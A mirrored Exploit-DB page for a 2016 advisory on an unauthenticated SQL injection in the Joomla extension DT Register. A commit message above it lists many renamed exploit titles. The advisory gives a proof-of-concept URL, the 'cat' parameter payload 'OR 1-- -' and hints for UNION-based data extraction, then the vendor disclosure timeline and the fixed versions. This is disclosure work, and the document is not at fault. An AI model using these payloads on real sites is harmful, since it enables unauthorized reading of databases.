bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40912.txt
Offensive Security eddddf7aa8 DB: 2016-12-15 
5 new exploits

Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)
Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)

Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities
Poppler 0.10.3 - Denial of Service

Samsung Devices KNOX Extensions - OTP Service Heap Overflow

Serva 3.0.0 HTTP Server - Denial of Service
Serva 3.0.0 - HTTP Server Denial of Service
TP-LINK TD-W8151N - Denial of Service
Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow

CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)
Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)
Trixbox - (langChoice) Local File Inclusion (connect-back) (2)
Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)
Fonality trixbox - 'langChoice' Parameter Local File Inclusion (connect-back) (2)
Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)
Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (1)
Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (2)
Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (1)
Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (2)

Joomla! Component 'com_contenthistory' - SQL Injection / Remote Code Execution (Metasploit)
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)

McAfee Virus Scan Enterprise for Linux - Remote Code Execution

BrewBlogger 1.3.1 - (printLog.php) SQL Injection
BrewBlogger 1.3.1 - 'printLog.php' SQL Injection

ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities
ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete

ContentNow 1.30 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting

ContentNow 1.39 - (pageid) SQL Injection
ContentNow 1.39 - 'pageid' Parameter SQL Injection

Maian Recipe 1.0 - (path_to_folder) Remote File Inclusion
Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion

Sisplet CMS 05.10 - (site_path) Remote File Inclusion
Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion
Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection
VanGogh Web CMS 0.9 - (article_ID) SQL Injection
Sisplet CMS 2008-01-24 - 'id' Parameter SQL Injection
VanGogh Web CMS 0.9 - 'article_ID' Parameter SQL Injection
Efestech Shop 2.0 - 'cat_id' SQL Injection
plx Ad Trader 3.2 - (adid) SQL Injection
Joomla! Component versioning 1.0.2 - 'id' SQL Injection
Joomla! Component mygallery - 'cid' SQL Injection
XchangeBoard 1.70 - (boardID) SQL Injection
CMS little 0.0.1 - (index.php template) Local File Inclusion
Joomla! Component com_brightweblinks - 'catid' SQL Injection
Efestech Shop 2.0 - 'cat_id' Parameter SQL Injection
plx Ad Trader 3.2 - 'adid' Parameter SQL Injection
Joomla! Component versioning 1.0.2 - 'id' Parameter SQL Injection
Joomla! Component mygallery - 'cid' Parameter SQL Injection
XchangeBoard 1.70 - 'boardID' Parameter SQL Injection
CMS little 0.0.1 - 'template' Parameter Local File Inclusion
Joomla! Component Brightcode Weblinks - 'catid' Parameter SQL Injection

phPortal 1.2 - Multiple Remote File Inclusions
PHPortal 1.2 - Multiple Remote File Inclusions
phpWebNews 0.2 MySQL Edition - (id_kat) SQL Injection
phpWebNews 0.2 MySQL Edition - (det) SQL Injection
pHNews CMS - Multiple Local File Inclusion
PHPwebnews 0.2 MySQL Edition - 'id_kat' Parameter SQL Injection
PHPwebnews 0.2 MySQL Edition - 'det' Parameter SQL Injection
pHNews CMS Alpha 1 - Local File Inclusion

Kasseler CMS 1.3.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting
XPOZE Pro 3.06 - 'uid' SQL Injection
ContentNow 1.4.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)
XPOZE Pro 3.06 - 'uid' Parameter SQL Injection
ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
Fuzzylime CMS 3.01a - (file) Local File Inclusion
Triton CMS Pro - (x-forwarded-for) Blind SQL Injection
Neutrino 0.8.4 Atomic Edition - Remote Code Execution
SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (2)
Fuzzylime CMS 3.01a - 'file' Parameter Local File Inclusion
Triton CMS Pro 1.06 - 'x-forwarded-for' Blind SQL Injection
QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)

Joomla! Component com_content 1.0.0 - 'itemID' SQL Injection
Joomla! Component Content 1.0.0 - 'itemID' Parameter SQL Injection

BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion
BoonEx Ray 3.5 - 'sIncPath' Parameter Remote File Inclusion
DreamPics Builder - (page) SQL Injection
DreamNews Manager - 'id' SQL Injection
gapicms 9.0.2 - (dirDepth) Remote File Inclusion
phpDatingClub - 'website.php' Local File Inclusion
DreamPics Builder - 'page' Parameter SQL Injection
DreamNews Manager - 'id' Parameter SQL Injection
gapicms 9.0.2 - 'dirDepth' Parameter Remote File Inclusion
phpDatingClub 3.7 - 'website.php' Local File Inclusion

Million Pixels 3 - (id_cat) SQL Injection
Million Pixels 3 - 'id_cat' Parameter SQL Injection
Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (PHP)
Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (Perl)
Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (PHP)
Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (Perl)
WebCMS Portal Edition - 'id' SQL Injection
jsite 1.0 oe - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities
Avlc Forum - 'vlc_forum.php id' SQL Injection
Fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution
WebCMS Portal Edition - 'id' Parameter SQL Injection
jsite 1.0 oe - SQL Injection / Local File Inclusion
Avlc Forum - 'vlc_forum.php' SQL Injection
Fuzzylime CMS 3.01 - 'commrss.php' Remote Code Execution

Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection
Ultrastats 0.2.142 - 'players-detail.php' Blind SQL Injection

CodeDB - 'list.php lang' Local File Inclusion
CodeDB 1.1.1 - 'list.php' Local File Inclusion

Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)
Pluck CMS 4.5.1 - 'blogpost' Parameter Local File Inclusion (win only)
Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion
Comdev Web Blogger 4.1.3 - (arcmonth) SQL Injection
Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion
Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection

phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling
PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling

WebCMS Portal Edition - 'index.php id' Blind SQL Injection
WebCMS Portal Edition - 'id' Parameter Blind SQL Injection

Pluck 4.5.3 - (update.php) Remote File Corruption Exploit
Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit

Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection
Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection

Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion
Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion

Fuzzylime CMS 3.03 - (track.php p) Local File Inclusion
Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion

CMS little 0.0.1 - (index.php term) SQL Injection
CMS little 0.0.1 - 'term' Parameter SQL Injection

SHOP-INET 4 - 'show_cat2.php grid' SQL Injection
SHOP-INET 4 - 'grid' Parameter SQL Injection

Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion
Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion

Joomla! Component Maian Music 1.2.1 - (category) SQL Injection
Joomla! Component Maian Music 1.2.1 - 'category' Parameter SQL Injection

Pluck 4.6.2 - (langpref) Local File Inclusion
Pluck CMS 4.6.2 - 'langpref' Parameter Local File Inclusion

phportal 1.0 - Insecure Cookie Handling
PHPortal 1.0 - Insecure Cookie Handling

Kasseler CMS - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Kasseler CMS - File Disclosure / Cross-Site Scripting

DreamPics Builder - (exhibition_id) SQL Injection
DreamPics Builder - 'exhibition_id' Parameter SQL Injection

Trixbox 2.2.4 - PhonecDirectory.php SQL Injection
Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection

Kasseler CMS 1.4.x lite - (Module Jokes) SQL Injection
Kasseler CMS 1.4.x lite Module Jokes - SQL Injection

PHPortal_1.2 - (gunaysoft.php) Remote File Inclusion
PHPortal 1.2 - 'gunaysoft.php' Remote File Inclusion

Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion (Metasploit)
Fonality trixbox CE 2.6.1 - 'langChoice' Parameter Local File Inclusion (Metasploit)

maian weblog 4.0 - Blind SQL Injection
Maian Weblog 4.0 - Blind SQL Injection

brewblogger 2.3.2 - Multiple Vulnerabilities
BrewBlogger 2.3.2 - Multiple Vulnerabilities
Maian Weblog 2.0 - print.php Multiple Parameter SQL Injection
Maian Weblog 2.0 - mail.php Multiple Parameter SQL Injection
Maian Weblog 2.0 - 'print.php' SQL Injection
Maian Weblog 2.0 - 'mail.php' SQL Injection
PHPwebnews 0.1 - iklan.php m_txt Parameter Cross-Site Scripting
PHPwebnews 0.1 - 'index.php' m_txt Parameter Cross-Site Scripting
PHPwebnews 0.1 - bukutamu.php m_txt Parameter Cross-Site Scripting
PHPwebnews 0.1 - 'iklan.php' Cross-Site Scripting
PHPwebnews 0.1 - 'index.php' Cross-Site Scripting
PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting

Joomla! Component com_content 1.5 RC3 - 'index.php' view Parameter SQL Injection
Joomla! Component Content 1.5 RC3 - 'view' Parameter SQL Injection
Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting
Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting
Fonality trixbox 2.4.2 - Cross-Site Scripting

Pluck 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities
Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities

Trixbox - SQL Injection
Fonality trixbox - SQL Injection

Trixbox - 'endpoint_aastra.php mac Parameter' Remote Code Injection
Fonality trixbox - 'mac' Parameter Remote Code Injection

THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities

Pluck 4.6.3 - 'cont1' Parameter HTML Injection
Pluck CMS 4.6.3 - 'cont1' Parameter HTML Injection

Pluck 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities
Pluck CMS 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities

Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection
Boonex Dolphin 6.1 - 'get_list.php' SQL Injection

Joomla! Component 'com_content' - 'year' Parameter SQL Injection
Joomla! Component Content - 'year' Parameter SQL Injection

Pluck 4.7 - Directory Traversal
Pluck CMS 4.7 - Directory Traversal

SenseSites CommonSense CMS - cat2.php id Parameter SQL Injection
SenseSites CommonSense CMS - 'id' Parameter SQL Injection
Fonality trixbox - /maint/modules/endpointcfg/endpoint_generic.php mac Parameter SQL Injection
Fonality trixbox - /maint/modules/home/index.php lang Parameter Directory Traversal
Fonality trixbox - '/maint/modules/asterisk_info/asterisk_info.php' lang Parameter Directory Traversal
Fonality trixbox - /maint/modules/repo/repo.php lang Parameter Directory Traversal
Fonality trixbox - '/maint/modules/endpointcfg/endpointcfg.php' lang Directory Traversal
Fonality trixbox - /var/www/html/maint/modules/home/index.php lang Parameter Remote Code Execution
Fonality trixbox - 'endpoint_generic.php' SQL Injection
Fonality trixbox - 'index.php' Directory Traversal
Fonality trixbox - 'asterisk_info.php' Directory Traversal
Fonality trixbox - 'repo.php' Directory Traversal
Fonality trixbox - 'endpointcfg.php' Directory Traversal
Fonality trixbox - 'index.php' Remote Code Execution

Joomla! Component DT Register - 'cat' SQL Injection
2016-12-15 05:01:19 +00:00

99 lines
3.5 KiB
Text
Executable file
Raw Blame History

Title: SQL injection in Joomla extension DT Register
Credit: Elar Lang / https://security.elarlang.eu
Vulnerability: SQL injection
Vulnerable version: before 3.1.12 (Joomla 3.x) / 2.8.18 (Joomla 2.5)
CVE: pending
Full Disclosure URL: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
Vendor: DTH Development
Vendor URL: http://www.dthdevelopment.com/
Product: DT Register "Calendar & Event Registration"
Product URL: https://extensions.joomla.org/extension/dt-register
Product URL: http://www.dthdevelopment.com/joomla-components/dt-register-event-registration-for-joomla.html
# Background
"DT Register is the Joomla Event Registration component that gives you
functionality beyond what any other event booking solution can offer"
(https://extensions.joomla.org/extension/dt-register)
# Vulnerability
SQL injection in Joomla extension "DT Register" by DTH Development
allows remote unauthenticated attacker to execute arbitrary SQL
commands via the cat parameter.
# Preconditions
No pre-conditions for authentication or authorization.
# Proof-of-Concept
http://[DOMAIN]/[PATH]/index.php?controller=calendar&format=raw&cat[0]=SQLi&task=events
PoC value (shows out all events / it's possible to see valid eventId values):
cat[0]=6) OR 1-- -
## Using UNION
For reading the data out using UNION it's important to have and to
know one valid eventId (detected in previous step).
In total there are 112 fields in select query, eventId position is no
13. For output is best to use position 112.
Step-by-Step - how to read the data out is available in blog:
https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
# Vulnerability Disclosure Timeline
Full communication is available in blog:
https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
2016-10-17 | me > DTH | via web form - I would like to report some
security holes. What is the correct way for that?
2016-10-18 | me > DTH | any response?
2016-10-25 | me > DTH | mail to dthdev@dthdevelopment.com
2016-10-25 | DTH > me |
* "you are not in our client list"
* "Our site (dthdevelopment.com) is protected by an enterprise grade firewall"
2016-10-25 | me > DTH | I'm whitehat, technical details
2016-10-25 | DTH > me | description, what kind of serious problems I may face
2016-10-25 | me > DTH | explanations
2016-11-02 | me > DTH | hello?
2016-11-11 | me > DTH, SiteLock | Last call.
2016-11-11 | SiteLock / DTH / me | some communication
2016-11-12 | DTH > SiteLock (CC to me) | "It was configured to be open
in the setup"
2016-11-15 | DTH | Released DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5)
2016-12-05 | DTH > me | "Sorry, forgot to respont on this. We closed
the problem on our demo site".
2016-12-12 | me | Full Disclosure on security.elarlang.eu
2016-12-13 | me | Full Disclosure on FullDisclosure mailinglist on seclists.org
## asking CVE from DWF (Distributed Weakness Filing Project) /
http://iwantacve.org
2016-10-20 | me > DWF | CVE request
2016-10-31 | DWF > me | "CVE - Acceptance of MITRE Terms of Use for
CVE Assignment"
2016-10-31 | me > DWF | I accept
2016-11-19 | me > DWF | Any feedback or decision? (still no response)
2016-12-11 | me > DWF | Is there any hope to get feedback? (still no response)
As I haven't got any feedback, you can take this post as CVE request.
# Fix
DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5).
--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com
Reference in a new issue View git blame Copy permalink